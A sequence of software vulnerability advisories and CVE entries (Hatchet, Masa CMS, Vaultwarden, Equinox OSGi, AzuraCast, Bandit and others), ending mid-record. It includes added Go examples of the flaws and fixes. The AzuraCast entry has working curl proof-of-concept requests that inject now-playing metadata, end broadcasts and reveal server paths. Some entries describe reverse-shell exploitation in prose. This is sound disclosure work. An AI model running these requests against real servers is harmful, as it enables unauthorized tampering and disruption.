Full description
## Summary

A missing authorization directive on the `GET /api/v1/stable/dags/tasks` endpoint caused Hatchet's tenant-membership check to be skipped for this route. A user authenticated to any tenant on the same Hatchet instance could query the endpoint with another tenant's UUID and a DAG UUID belonging to that tenant, and receive task metadata for that DAG.

This issue has been patched in **v0.83.39**. Hatchet Cloud has been patched and requires no action from users. Self-hosted users should upgrade.

## Impact

**Who is affected.** Multi-tenant Hatchet instances reachable by an attacker who can obtain an account on that instance. On Hatchet Cloud, account creation is open by default. On self-hosted instances, the API must be reachable by the attacker and the hostname known; instances deployed inside a VPC or with signup restricted are not exposed to arbitrary external actors.

**Prerequisites for exploitation.** An attacker needed:

1. An account on the target Hatchet instance.
2. The victim tenant's UUID.
3. At least one DAG UUID (`external_id`) belonging to that tenant.

The two UUIDs are not treated as secrets — they appear in URLs, API responses, audit logs, invitation flows, shared run links, and dashboard screenshots — but an attacker does need to learn them through some out-of-band channel before exploitation is possible.

**What could be disclosed.** For each child task of a targeted DAG, the endpoint returned:

- `display_name`, `action_id`, `step_id`
- `workflow_id`, `workflow_version_id`, `workflow_run_id`, `task_external_id`
- `tenant_id`, `retry_count`, `status`, timestamps
- `additional_metadata` (JSON)

The `additional_metadata` field is the most sensitive: Hatchet workflows commonly use it to carry domain context such as user identifiers, customer IDs, feature flags, or correlation tokens. Its contents vary by deployment.
**What was not disclosed.** The raw task `input` payload is not part of this endpoint's response shape and was not exposed through this issue. The scope is limited to task metadata, not task arguments or results.

**Exploitation status.** We have no evidence that this vulnerability was exploited prior to the patch.

## Root cause

Hatchet's multi-tenant authorization relies on an OpenAPI-driven middleware pipeline. Each authenticated operation declares `x-resources: ["tenant", ...]` in its spec. The `populator` middleware reads the declared resources, looks up the corresponding entities from request parameters, and stores them on the request context. The `authz` middleware then verifies that the authenticated user is a member of the tenant found on the context.

The `listTasksByDAGIds` operation accepted a `tenant` UUID as a query parameter, but its OpenAPI definition did not declare `x-resources: ["tenant"]`. As a result:

1. The populator, which early-returns when no resources are declared, did not populate the tenant onto the request context.
2. The authz middleware, which runs its membership check only when a tenant is present on the context, silently passed the request through.
3. The handler read the tenant UUID directly from the query parameter and used it as the filter in the downstream OLAP query.

The SQL query itself correctly filters by `tenant_id`, so it returned only rows matching the supplied UUID — but the UUID came from the caller rather than from an authorization-validated context, so the filter bounded the response to the *attacker-named* tenant rather than to a tenant the caller was authorized to read.

Every other authenticated operation in the same path file (`tasks.yaml`) correctly declared `x-resources`. This endpoint was the only authenticated operation in the file that did not.

## Patch

The fix adds the missing resource authz checks inline on the handler, enforcing valid tenant membership before the handler runs. Shipped in **v0.83.39**.
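To make the root cause concrete, here is an added, self-contained model of the populator/authz pipeline described above in Go's `net/http`. It is not Hatchet's code: the `X-User` header standing in for the authenticated identity, the `membership` table and the operation struct are all constructed for this illustration. It shows why an operation with no declared resources sails through both middlewares, and that declaring the tenant resource (equivalent in effect to the inline check the advisory's patch adds) makes the same cross-tenant request fail with 403.

```go
package main

import (
	"context"
	"fmt"
	"net/http"
	"net/http/httptest"
)

type ctxKey string

const tenantKey ctxKey = "tenant"

// Constructed membership table: user -> tenants the user belongs to.
var membership = map[string]map[string]bool{
	"alice": {"tenant-A": true},
	"bob":   {"tenant-B": true},
}

// operation models one OpenAPI operation: its x-resources list and its handler.
type operation struct {
	resources []string
	handler   http.HandlerFunc
}

// populator resolves declared resources from the request and stores them on
// the context. With no declared resources it returns early and stores nothing.
func populator(op operation, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if len(op.resources) == 0 {
			next.ServeHTTP(w, r)
			return
		}
		for _, res := range op.resources {
			if res == "tenant" {
				tenant := r.URL.Query().Get("tenant")
				r = r.WithContext(context.WithValue(r.Context(), tenantKey, tenant))
			}
		}
		next.ServeHTTP(w, r)
	})
}

// authz enforces tenant membership, but only when a tenant is on the context.
// That conditional is what lets an undeclared route pass through unchecked.
func authz(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		tenant, _ := r.Context().Value(tenantKey).(string)
		if tenant == "" {
			next.ServeHTTP(w, r)
			return
		}
		user := r.Header.Get("X-User") // assumption: stands in for the authenticated identity
		if !membership[user][tenant] {
			http.Error(w, "not a member of tenant", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// listTasks filters by the caller-supplied tenant UUID, as the vulnerable
// handler did; the query is bounded to whatever tenant the caller names.
func listTasks(w http.ResponseWriter, r *http.Request) {
	fmt.Fprintf(w, "tasks for %s", r.URL.Query().Get("tenant"))
}

// The vulnerable operation declares no x-resources; the fixed one declares
// "tenant", so the populator fills the context and authz runs its check.
var (
	vulnerableOp = operation{resources: nil, handler: listTasks}
	fixedOp      = operation{resources: []string{"tenant"}, handler: listTasks}
)

func build(op operation) http.Handler { return populator(op, authz(op.handler)) }

// callListTasks issues the DAG-tasks request as user against tenant and
// returns the HTTP status code.
func callListTasks(h http.Handler, user, tenant string) int {
	req := httptest.NewRequest("GET", "/api/v1/stable/dags/tasks?tenant="+tenant, nil)
	req.Header.Set("X-User", user)
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	// bob is a member of tenant-B only, yet names tenant-A in the query.
	fmt.Println("vulnerable:", callListTasks(build(vulnerableOp), "bob", "tenant-A")) // 200
	fmt.Println("fixed:     ", callListTasks(build(fixedOp), "bob", "tenant-A"))      // 403
}
```

The lesson for reviewers of such pipelines: an authz middleware that is conditional on state populated by an earlier stage fails open whenever that stage is skipped, so a route that accepts a tenant identifier but declares no resources should be flagged by a spec lint, not discovered by an external report.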
## Remediation

**Hatchet Cloud.** No action required. The patch was deployed on April 23, 2026 within the same day it was reported.

**Self-hosted — recommended.** Upgrade to **v0.83.39** or later.

**Self-hosted — if you cannot upgrade immediately.** Either of the following reduces exposure until you can upgrade:

- Restrict account creation by setting `SERVER_AUTH_RESTRICTED_EMAIL_DOMAINS` to an allowlist of domains you control. This prevents arbitrary users from registering an account on your instance, which removes the most common path to the prerequisite account.
- Ensure the Hatchet API is not exposed to untrusted networks. We generally recommend running Hatchet inside a VPC and fronting the API with authenticated network controls; deployments configured this way were not reachable by arbitrary external attackers.

## Timeline

All times April 23, 2026.

- **14:05** — Reported to Hatchet.
- **16:28** — Patch deployed to Hatchet Cloud and released as v0.83.39.
- Public disclosure — this advisory.

## Credit

Reported by @sajdakabir. Hatchet thanks the reporter for responsibly disclosing this issue and for the clear, reproducible writeup.
Affected versions
All versions < 0.83.39
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
Full description
OpenClaw before 2026.4.20 contains a server-side request forgery vulnerability in QQBot direct media upload that skips URL validation. Attackers can bypass SSRF protections by sending crafted image URLs to uploadC2CMedia and uploadGroupMedia endpoints to relay unintended requests.
Affected versions
2026.4.20
Vulnerability type
CWE-918 — SSRF
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Full description
Masa CMS is an open source content management system. In versions 7.2.0 through 7.2.9, 7.3.0 through 7.3.14, 7.4.0 through 7.4.9, and 7.5.0 through 7.5.2, a SQL injection vulnerability exists in the beanFeed.cfc component within the getQuery function's handling of the sortDirection parameter. The parameter value is concatenated directly into SQL queries without sanitization or parameterization. An unauthenticated remote attacker can exploit this to extract sensitive information, modify or delete database records, or potentially achieve remote code execution on the underlying database server. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, use a WAF to block or restrict access to the beanFeed.cfc component, or deploy rules to detect SQL injection patterns targeting the sortDirection parameter.
Vulnerability type
CWE-89 — SQL Injection
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
Masa CMS is an open source content management system. In versions 7.5.2 and earlier, a SQL injection vulnerability exists in the beanFeed.cfc component within the getQuery function's processing of the sortBy parameter. The application fails to properly sanitize or parameterize this input before incorporating it into dynamic SQL statements. An unauthenticated remote attacker can execute arbitrary SQL commands against the database, potentially gaining access to sensitive data, modifying or deleting records, or escalating privileges to administrative control. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, configure WAF rules to block malicious SQL patterns in the sortBy parameter sent to beanFeed.cfc.
Vulnerability type
CWE-89 — SQL Injection
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
Vaultwarden is a Bitwarden-compatible server written in Rust. In version 1.35.4 and earlier, the get_org_collections_details endpoint (GET /api/organizations/{org_id}/collections/details) is missing the has_full_access() authorization check that exists on the sibling get_org_collections endpoint. This allows any Manager-role user with accessAll=False and no collection assignments to retrieve the names, UUIDs, user-to-collection mappings, and group-to-collection mappings for all collections in the organization. This issue has been fixed in version 1.35.5.
Affected versions
1.35.5
Vulnerability type
CWE-862 — Missing Authorization
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
In Eclipse OpenJ9 versions 0.21 to 0.58, a pre-authentication remote attacker can crash JITServer by sending a 32-byte crafted TCP message.
Affected versions
All versions < 0.59.0
Vulnerability type
CWE-125 — Out-of-bounds Read
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
## Summary

Heartbeat owner downgrade missed untrusted webhook wake events.

## Affected Packages / Versions

- Package: `openclaw`
- Ecosystem: npm
- Affected versions: `>= 2026.4.7 < 2026.4.14`
- Patched versions: `>= 2026.4.14`

## Impact

Heartbeat owner downgrade logic could skip webhook wake events carrying untrusted content, preserving owner-like execution context where the run should have been downgraded.

## Technical Details

The fix includes wake and hook event reasons in owner-downgrade inspection and forces downgrade for untrusted hook wake events.

## Fix

The issue was fixed in #66031. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.

## Fix Commit(s)

- `31281bc92f55796817a92bc43f722cba1e77ab42`
- PR: #66031

## Release Process Note

Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.

## Credits

Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.
Affected versions
2026.4.7 - 2026.4.14
Vulnerability type
CWE-184 — CWE-184
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Full description
Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Attackers can connect to the OSGi console port and send base64-encoded bash commands wrapped in fork directives to achieve code execution and establish reverse shell connections.
Vulnerability type
CWE-306 — Auth Bypass
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Full description
Eclipse Equinox OSGi versions 3.8 through 3.18 contain a remote code execution vulnerability in the console interface that allows unauthenticated attackers to execute arbitrary code by exploiting the fork command functionality. Attackers can establish a telnet connection to the OSGi console, perform a telnet handshake, and send fork commands to download and execute malicious Java code, establishing a reverse shell connection.
Vulnerability type
CWE-306 — Auth Bypass
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Full description
A vulnerability was identified in itsourcecode Courier Management System 1.0. This impacts an unknown function of the file /print_pdets.php. The manipulation of the argument ids leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used.
Vulnerability type
CWE-74 — Injection
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Full description
## Summary

The `/api/internal/{station_id}/liquidsoap/{action}` endpoint is accessible from the public web interface because it lacks the `RequireInternalConnection` middleware that protects other internal endpoints (`/sftp-auth`, `/sftp-event`). Combined with a logic flaw where the `$asAutoDj` flag is set based on the *presence* of the `X-Liquidsoap-Api-Key` header rather than its *validated value*, any user with the basic `View` station permission can invoke privileged Liquidsoap commands — injecting arbitrary now-playing metadata visible to all listeners, disrupting live broadcast tracking, and disclosing absolute filesystem paths.

## Details

**Issue 1: Missing RequireInternalConnection middleware**

In `backend/config/routes/api_internal.php`, the liquidsoap route group (lines 17-21) lacks the `RequireInternalConnection` middleware:

```php
// Lines 17-21 — NO RequireInternalConnection
$group->map(
    ['GET', 'POST'],
    '/liquidsoap/{action}',
    Controller\Api\Internal\LiquidsoapAction::class
)->setName('api:internal:liquidsoap');
```

Compare with sftp endpoints that correctly apply it:

```php
// Lines 32-34 — HAS RequireInternalConnection
$group->post('/sftp-auth', Controller\Api\Internal\SftpAuthAction::class)
    ->setName('api:internal:sftp-auth')
    ->add(Middleware\RequireInternalConnection::class);
```

The nginx config (`util/docker/web/nginx/azuracast.conf.tmpl`) only sets the `IS_INTERNAL` FastCGI parameter on the internal port 6010 listener (line 44), not on the public-facing server block (ports 80/443). Without the middleware, the endpoint is fully accessible from the public internet.

**Issue 2: `$asAutoDj` derived from header presence, not validated value**

In `backend/src/Controller/Api/Internal/LiquidsoapAction.php`:

```php
// Line 34 — checks header PRESENCE, not value
$asAutoDj = $request->hasHeader('X-Liquidsoap-Api-Key');

// Lines 38-44 — key value only checked when ACL FAILS
$acl = $request->getAcl();
if (!$acl->isAllowed(StationPermissions::View, $station->id)) {
    $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key');
    if (!$station->validateAdapterApiKey($authKey)) {
        throw new RuntimeException('Invalid API key.');
    }
}
```

When a user authenticates via session/API key and has `StationPermissions::View`, the ACL check passes and the adapter API key is never validated. But `$asAutoDj` is already `true` from line 34 because the header is present (with any arbitrary value).

**Affected commands:**

- `FeedbackCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/FeedbackCommand.php:36`): Guard `if (!$asAutoDj) return false;` bypassed — creates SongHistory records and forces NowPlaying cache updates
- `DjOffCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/DjOffCommand.php:24`): Guard bypassed — calls `$this->streamerRepo->onDisconnect($station)` which ends all active broadcasts and sets `$station->is_streamer_live = false`
- `DjOnCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/DjOnCommand.php:31`): Guard bypassed — calls `$this->streamerRepo->onConnect($station, $user)` with attacker-controlled username
- `CopyCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/CopyCommand.php:18`): No `$asAutoDj` guard at all — returns absolute filesystem paths via `$mediaFs->getLocalPath($uri)`

## PoC

**Prerequisites:** A user account with `StationPermissions::View` on station ID 1 (the lowest station-level permission). Obtain a session cookie or API key for this user.

**1. Inject arbitrary now-playing metadata (FeedbackCommand):**

```bash
curl -X POST 'https://target/api/internal/1/liquidsoap/feedback' \
  -H 'X-API-Key: <view-user-api-key>' \
  -H 'X-Liquidsoap-Api-Key: anything' \
  -H 'Content-Type: application/json' \
  -d '{"artist": "INJECTED", "title": "Fake Song Title"}'
```

Expected: Should reject — user does not have the adapter API key.
Actual: Returns `true`. The injected artist/title appears in `/api/nowplaying/1` for all listeners.

**2. Disrupt live broadcast (DjOffCommand):**

```bash
curl -X POST 'https://target/api/internal/1/liquidsoap/djoff' \
  -H 'X-API-Key: <view-user-api-key>' \
  -H 'X-Liquidsoap-Api-Key: anything'
```

Expected: Should reject.
Actual: Returns `true`. All active broadcast records for the station are terminated (`timestampEnd` set), `is_streamer_live` set to `false`, and `current_streamer` cleared.

**3. Disclose filesystem paths (CopyCommand):**

```bash
curl -X POST 'https://target/api/internal/1/liquidsoap/cp' \
  -H 'X-API-Key: <view-user-api-key>' \
  -H 'Content-Type: application/json' \
  -d '{"uri": "test.mp3"}'
```

Expected: Should reject — this is an internal-only endpoint.
Actual: Returns `{"uri":"/var/azuracast/stations/1/media/test.mp3","isTemp":false}` — disclosing the absolute filesystem path of the station's media storage.

## Impact

Any user with the basic `StationPermissions::View` permission (the lowest station-level role, commonly assigned to DJs and collaborators) can:

1. **Inject arbitrary now-playing metadata** visible to all listeners via the public NowPlaying API and any connected players/widgets. This poisons the song history database and triggers cache updates that propagate the false data to all consumers.
2. **Disrupt live broadcasts** by terminating all active broadcast records and marking the station as having no live streamer, even when a DJ is actively broadcasting. This affects broadcast recording and live-DJ tracking.
3. **Fake DJ connections** with arbitrary usernames via the `djon` command, polluting streamer logs and potentially interfering with DJ scheduling.
4. **Disclose absolute filesystem paths** of the station's media storage directory via the `cp` command (no `$asAutoDj` guard required), which aids further attacks against the server.

## Recommended Fix

**Fix 1: Add `RequireInternalConnection` middleware to the liquidsoap route group.**

In `backend/config/routes/api_internal.php`, add the middleware to the station group:

```php
$group->group(
    '/{station_id}',
    function (RouteCollectorProxy $group) {
        $group->map(
            ['GET', 'POST'],
            '/liquidsoap/{action}',
            Controller\Api\Internal\LiquidsoapAction::class
        )->setName('api:internal:liquidsoap')
+       ->add(Middleware\RequireInternalConnection::class);

        // Icecast internal auth functions
        $group->map(
            ['GET', 'POST'],
            '/listener-auth[/{api_auth}]',
            Controller\Api\Internal\ListenerAuthAction::class
        )->setName('api:internal:listener-auth');
    }
)->add(Middleware\GetStation::class);
```

**Fix 2: Validate the API key value before setting `$asAutoDj`.**

In `backend/src/Controller/Api/Internal/LiquidsoapAction.php`, move `$asAutoDj` assignment after key validation:

```php
-   $asAutoDj = $request->hasHeader('X-Liquidsoap-Api-Key');
+   $asAutoDj = false;

    try {
        $acl = $request->getAcl();
        if (!$acl->isAllowed(StationPermissions::View, $station->id)) {
            $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key');
            if (!$station->validateAdapterApiKey($authKey)) {
                throw new RuntimeException('Invalid API key.');
            }
+           $asAutoDj = true;
+       } else {
+           // Even ACL-authenticated users must provide valid adapter key for AutoDJ operations
+           $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key');
+           $asAutoDj = !empty($authKey) && $station->validateAdapterApiKey($authKey);
        }
```

Both fixes should be applied. Fix 1 is the primary defense (defense in depth — this endpoint should never be publicly accessible). Fix 2 corrects the logic flaw so that `$asAutoDj` is only `true` when the adapter API key is actually valid, regardless of how authentication was performed.
Affected versions
All versions < 0.10.0, 0.10.1, 0.10.2, 0.10.3, 0.10.4
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Full description
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2026-6074. Reason: This record is a reservation duplicate of CVE-2026-6074. Notes: All CVE users should reference CVE-2026-6074 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage.
References
Full description
A flaw has been found in Acrel Electrical ECEMS Enterprise Microgrid Energy Efficiency Management System 1.3.0. The impacted element is an unknown function of the file /SubstationWEBV2/main/elecMaxMinAvgValue. Executing a manipulation of the argument fCircuitids can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Vulnerability type
CWE-74 — Injection
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Full description
Reliance on Untrusted Inputs in a Security Decision vulnerability in mtrudel bandit allows unauthenticated transport-state spoofing on plaintext HTTP connections. 'Elixir.Bandit.Pipeline':determine_scheme/2 in lib/bandit/pipeline.ex returns the client-supplied URI scheme verbatim, ignoring the transport's secure? flag. HTTP/1.1 absolute-form request targets (e.g. GET https://victim/path HTTP/1.1) and the HTTP/2 :scheme pseudo-header are both attacker-controlled strings that flow through this function. Over a plaintext TCP connection, a client can declare https and Bandit will set conn.scheme = :https even though no TLS was negotiated. Downstream Plug consumers that branch on conn.scheme are silently misled: Plug.SSL's already-secure branch skips its HTTP→HTTPS redirect, cookies emitted with secure: true are sent over plaintext, audit logs record requests as having arrived over HTTPS, and CSRF/SameSite gating may make incorrect decisions. This issue affects bandit: from 1.0.0 before 1.11.0.
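The same trust decision, as an added illustration in Go's `net/http` rather than Bandit's Elixir (this is not Bandit's code): `r.URL.Scheme` carries whatever the client wrote in an absolute-form target, while `r.TLS` is set by the server from the transport and cannot be declared by the client. The constructed request reproduces the advisory's case of a plaintext connection carrying `GET https://victim/path`, and the two small decision helpers stand in for the Plug.SSL redirect and `secure: true` cookie branches the description lists.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// claimedScheme mirrors the flawed determine_scheme/2: return whatever the
// client wrote in an absolute-form target (or the HTTP/2 :scheme header).
func claimedScheme(r *http.Request) string {
	if r.URL.Scheme != "" {
		return r.URL.Scheme
	}
	return "http"
}

// transportScheme derives the scheme from the connection's TLS state alone,
// which the peer cannot forge over a plaintext socket.
func transportScheme(r *http.Request) string {
	if r.TLS != nil {
		return "https"
	}
	return "http"
}

// plaintextAbsoluteForm is the constructed sample: the request as it arrives
// on a plain TCP connection with target "https://victim/path".
func plaintextAbsoluteForm() *http.Request {
	r := httptest.NewRequest("GET", "https://victim/path", nil)
	r.TLS = nil // httptest fakes a TLS state for https targets; none was negotiated here
	return r
}

// tlsRequest is the same request as served by a real TLS listener.
func tlsRequest() *http.Request {
	return httptest.NewRequest("GET", "https://victim/path", nil) // r.TLS is non-nil
}

// Downstream decisions that branch on the scheme, as Plug.SSL and cookie code do.
func shouldRedirectToHTTPS(scheme string) bool { return scheme != "https" }
func safeToMarkCookieSecure(scheme string) bool { return scheme == "https" }

func main() {
	cases := []struct {
		name string
		r    *http.Request
	}{
		{"plaintext conn, https in request target", plaintextAbsoluteForm()},
		{"real TLS conn", tlsRequest()},
	}
	for _, c := range cases {
		claimed, transport := claimedScheme(c.r), transportScheme(c.r)
		fmt.Printf("%-42s claimed=%-5s transport=%-5s redirect(claimed)=%v redirect(transport)=%v\n",
			c.name, claimed, transport, shouldRedirectToHTTPS(claimed), shouldRedirectToHTTPS(transport))
	}
}
```

On the plaintext request the claimed scheme skips the redirect and would let a Secure cookie go out in clear, while the transport-derived scheme redirects; the two agree only when TLS was actually negotiated. A server framework should therefore set the scheme from the listener (or from a proxy header it has explicitly chosen to trust), never from the request line.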
Vulnerability type
CWE-807 — CWE-807
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2025-67968. Reason: This candidate is a reservation duplicate of CVE-2025-67968. Notes: All CVE users should reference CVE-2025-67968 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
References
Full description
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2026-2052. Reason: This candidate is a reservation duplicate of CVE-2026-2052 Notes: All CVE users should reference CVE-2026-2052 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
References
Full description
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
References
Full description
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
References
Full description
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
References
Full description
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
References
Full description
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
References
Full description
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
References
Full description
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
References
Full description
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
References
Full description
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2025-12494. Reason: This candidate is a reservation duplicate of CVE-2025-12494. Notes: All CVE users should reference CVE-2025-12494 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
References
Full description
Insufficient validation of node IDs in Qt SVG module allows arbitrary QML/JavaScript code injection when loading malicious SVG files through the VectorImage component in Qt Quick. While QML execution is typically more restricted than native code execution, this could still lead to denial of service, information disclosure, or other impacts depending on the application's privilege level and data access.
Affected versions
6.8.0 - 6.8.6
Vulnerability type
CWE-20 — Input Validation
CVSS Vector
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
Dancer::Session::Abstract versions through 1.3522 for Perl generates session ids insecurely. The session id is generated from summing the character codepoints of the absolute pathname with the process id, the epoch time and calls to the built-in rand() function to return a number between 0 and 999-billion, and concatenating that result three times. The path name might be known or guessed by an attacker, especially for applications known to be written using Dancer with standard installation locations. The epoch time can be guessed by an attacker, and may be leaked in the HTTP header. The process id comes from a small set of numbers, and workers may have sequential process ids. The built-in rand() function is seeded with 32-bits and is considered unsuitable for security applications. Predictable session ids could allow an attacker to gain access to systems.
Affected versions
1.3522
Vulnerability type
CWE-338 — CWE-338
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
Full description
Insufficient packet validation in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to bypass all checksum and minimum-size validation by spoofing the Ethernet source MAC address to match one of the device's own registered endpoints, because the loopback detection mechanism skips all input validation for packets whose source MAC matches a local endpoint. To mitigate this issue, users should upgrade to the fixed version when available.
Affected versions
4.0.0 - 4.2.6
Vulnerability type
CWE-290 — CWE-290
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Full description
A flaw has been found in fatbobman mail-mcp-bridge up to 1.3.3. Affected is an unknown function of the file src/mail_mcp_server.py. Executing a manipulation of the argument message_ids can lead to path traversal. The attack can be executed remotely. The exploit has been published and may be used. Upgrading to version 1.3.4 is able to address this issue. This patch is called 638b162b26532e32fa8d8047f638537dbdfe197a. Upgrading the affected component is recommended.
Vulnerability type
CWE-22 — Path Traversal
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
References
https://github.com/fatbobman/mail-mcp-bridge/commit/638b162b26532e32fa8d8047f638537dbdfe197a
https://github.com/fatbobman/mail-mcp-bridge/issues/2
https://github.com/fatbobman/mail-mcp-bridge/releases/tag/1.3.4
https://vuldb.com/submit/803096
https://vuldb.com/vuln/360107
https://vuldb.com/vuln/360107/cti
Full description
A vulnerability was determined in Artifex MuPDF up to 1.28.0. The impacted element is the function fz_subset_cff_for_gids of the file subset-cff.c of the component CFF Index Handler. This manipulation causes out-of-bounds read. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through a bug report but has not responded yet.
Affected versions
1.27.2
Vulnerability type
CWE-119 — Buffer Overflow
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Full description
Document structural anomalies caused inconsistencies between page element relationships and internal index states. When scripts triggered document modifications, object reference validity was not properly maintained, leading to a crash when accessing an invalid pointer during page information queries.
Affected versions
13.2.4
Vulnerability type
CWE-416 — Use After Free
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Full description
A vulnerability was detected in Tenda F456 1.0.0.5. Affected is the function fromGstDhcpSetSer of the file /goform/GstDhcpSetSer of the component httpd. Performing a manipulation of the argument dips results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used.
Vulnerability type
CWE-119 — Buffer Overflow
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Full description
### Summary

`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). By contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds. This inconsistency allows **silent partial writes** into caller-provided buffers.

### Affected code

